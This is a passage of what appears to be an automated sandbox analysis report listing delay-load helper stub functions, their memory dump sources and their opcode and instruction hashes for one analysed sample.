    • Opcode Fuzzy Hash: 1584a17132b7ce1ea7027b1eb1a35ffd0cfb931c6cd944bc5c0ee207c1225c3b
    • Instruction Fuzzy Hash: 5AB012F12A8043BC374863153F02F7E02AEC3C0B10330403FF001D8082D8810E412033
    Function 000CF3F4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: de825f635e1f5db0aef2eb43b3d1633933af84aa1c3c039f453f45ea26820268
    • Instruction ID: fd07f99dd7d2e783a1fdeb8bd0d5d60ca4614685dfd6738df9ecb28566af48f0
    • Opcode Fuzzy Hash: de825f635e1f5db0aef2eb43b3d1633933af84aa1c3c039f453f45ea26820268
    • Instruction Fuzzy Hash: 47B012D1268243BC378863153E02F7E025EC3C0B10330413FF401D4082D8400D802033
    Function 000CF408 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 96aa01eec7ace2b46f716048ba8cb97e7b2d824a586a335fb7485c82a5f48829
    • Instruction ID: 4bec00ba2619869da744f94464fd6748a69bd69461a619128ec9bf3fad0e6b40
    • Opcode Fuzzy Hash: 96aa01eec7ace2b46f716048ba8cb97e7b2d824a586a335fb7485c82a5f48829
    • Instruction Fuzzy Hash: B2B012D2268043BC374863153E02F7E025FC3C0B10370413FF001D4082D8400D402033
    Function 000CF41C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: d17bf1a7b982e28f23ef9a8a714285917e4cb0b337333bb697eedefa7a00002c
    • Instruction ID: 4f89b7498f0b1ddfc7e6c89e0eb29b5c35259b8e6885351af2cede8ae5d5561f
    • Opcode Fuzzy Hash: d17bf1a7b982e28f23ef9a8a714285917e4cb0b337333bb697eedefa7a00002c
    • Instruction Fuzzy Hash: 06B01291278143BC379863253E03F7E021EC3C0B10330813FF401D4082D8400D802073
    Function 000CF412 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: d8632c4e68d108c8f45bd8f453d175ce782ed207e7510a93742ede963c854e9f
    • Instruction ID: 9fcd00f89ba1278d89b7da4ca43cca829c43e6f96dc5fac6a0bbd983fb3ae121
    • Opcode Fuzzy Hash: d8632c4e68d108c8f45bd8f453d175ce782ed207e7510a93742ede963c854e9f
    • Instruction Fuzzy Hash: 5AB01291278043BC375863257E03F7E021EC3C0B10330803FF401D4082D8400D402033
    Function 000CF56D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 6d2424029e3fa256ca036fee32a15129e66836b82b3c0d59bdd52b6532a90db4
    • Instruction ID: 7812a1798c16cec672fa8746885ed6248e367589b73e4f1db82fa32828a00e31
    • Opcode Fuzzy Hash: 6d2424029e3fa256ca036fee32a15129e66836b82b3c0d59bdd52b6532a90db4
    • Instruction Fuzzy Hash: 78B012D13E8502BE3308A3593E12FBE015EC3C8B50330403FF301D5041D9404C491173
    Function 000CF563 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 470a1553395498a3351eeb3b055421ab2d07faa084186938609c7e58f4946950
    • Instruction ID: b24ef3162f6e64d21ba94c00e3b5ff6526a909cc57d65c7b45f2624428e79bf0
    • Opcode Fuzzy Hash: 470a1553395498a3351eeb3b055421ab2d07faa084186938609c7e58f4946950
    • Instruction Fuzzy Hash: 51B012D13A8602BE370863593E02FBE018EC7C8B50330413FF301D5041D9404C8D1073
    Function 000CF595 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 03b160e737e92bc293849e692b32eca6d0ee131c7c2e410dcec131e856b0d55c
    • Instruction ID: 15368319a807906c64802940011fb263cdb75e9016e05f993fe65dfecb94b1ee
    • Opcode Fuzzy Hash: 03b160e737e92bc293849e692b32eca6d0ee131c7c2e410dcec131e856b0d55c
    • Instruction Fuzzy Hash: C6B012D53B8802BE3308A3597E12FBE014EC3C8B50330423FF341D5041D9404C491073
    Function 000CF689 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 7d767c7ec5e59f36ad730a72fcdbc9b1867d0d9bb465928d89726d956575713d
    • Instruction ID: ebe23fa1572c9e7a87d3f0b683f7dfab9646105f05e0fd23696f19e3f9c26c90
    • Opcode Fuzzy Hash: 7d767c7ec5e59f36ad730a72fcdbc9b1867d0d9bb465928d89726d956575713d
    • Instruction Fuzzy Hash: EDB01295278102BC330823517F03E7E010FCBC4B10330813FF101F84C298A10D411073
    Function 000CF6AE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: c5a8e3495029e7cd1c33b860c5994c364c2ec25659d92aa57affa0852278cd98
    • Instruction ID: 476ef4da0ae2be8f249841fe7de0f4b22bb118948e4bb169648ab0a857f51cfb
    • Opcode Fuzzy Hash: c5a8e3495029e7cd1c33b860c5994c364c2ec25659d92aa57affa0852278cd98
    • Instruction Fuzzy Hash: FCB01291278002BC330863652F03F7E011FC3C8B10330803FF105E90C1E8910C451173
    Function 000CF6A4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a85ef86db128322b6b30893199344e6ace48162dd36c6baab02e34c7a995608a
    • Instruction ID: cb9be1ef233e7ab1afe7c0da9fbd4086907df04c4b951552337089290356e21d
    • Opcode Fuzzy Hash: a85ef86db128322b6b30893199344e6ace48162dd36c6baab02e34c7a995608a
    • Instruction Fuzzy Hash: B4B01291278102FC330863652E03F7E011FC7C8B10330413FF005E51C1E8910D881173
    Function 000CF70F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF6FC
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 3bdd720d6f841164c97c09deb72d0d1c75061f374aa39283a305ed54a873898e
    • Instruction ID: 87f4c19d0cfcdeeb42e2c967415ea1e4659b282ac7d6a1726ab4ff90caebd2bf
    • Opcode Fuzzy Hash: 3bdd720d6f841164c97c09deb72d0d1c75061f374aa39283a305ed54a873898e
    • Instruction Fuzzy Hash: 44B012913A8102BC330863557F02F7E011EC3D0B10330443FF001D8441E8810D811033
    Function 000CF705 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF6FC
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 701bd4383d261ba397b553808b5cda7be404956f764a5f7ddbf6ec3c2cbf12d0
    • Instruction ID: d808ee547e01b3e6767e4f8af425e6ec06108549a7bfbbe72f033f17b25b6af4
    • Opcode Fuzzy Hash: 701bd4383d261ba397b553808b5cda7be404956f764a5f7ddbf6ec3c2cbf12d0
    • Instruction Fuzzy Hash: CAB01291368102BC33086355BE02F7E021EC3D0B10330843FF401D4441E8400C801033
    Function 000CF719 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF6FC
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 9fe6f11ec019e339cd88b33303b8927e1928cc9d3957d350082e37bb9f8e1f34
    • Instruction ID: 08f1e13cecf3afe01901abf69a6222be407b68823936f3b14098bb0b297125b1
    • Opcode Fuzzy Hash: 9fe6f11ec019e339cd88b33303b8927e1928cc9d3957d350082e37bb9f8e1f34
    • Instruction Fuzzy Hash: 29B01291368102BC330863557E02F7E011EC3D0B10330443FF001D4841E8400C801033
    Function 000CF72D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF6FC
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 87f48da4f3e202ac7aa5d1e22a61781ca341d6f0f5a112b9b7bd20881f7a1a98
    • Instruction ID: cbcc13b4fd0f9cdc4d13e8c82de9081c7afb57be70dedb047f2c00f7374f59df
    • Opcode Fuzzy Hash: 87f48da4f3e202ac7aa5d1e22a61781ca341d6f0f5a112b9b7bd20881f7a1a98
    • Instruction Fuzzy Hash: 82B01291368102BC33186355BE02F7E010EC3D0B10330843FF401D9441D8400C841033
    Function 000CF723 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF6FC
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 993326289cf059bac77b50e51a1b2c1d4f9356b5f5fd0a949b4b2a692ed15090
    • Instruction ID: 1f13ac7b376ad95dc8f134b467f7fc63fd278fd4eb1fdf18a4066b0aa1c8884a
    • Opcode Fuzzy Hash: 993326289cf059bac77b50e51a1b2c1d4f9356b5f5fd0a949b4b2a692ed15090
    • Instruction Fuzzy Hash: 4EB01291368202BC335863557E02F7E010EC3D0B10330493FF401D4441D8400CC01033
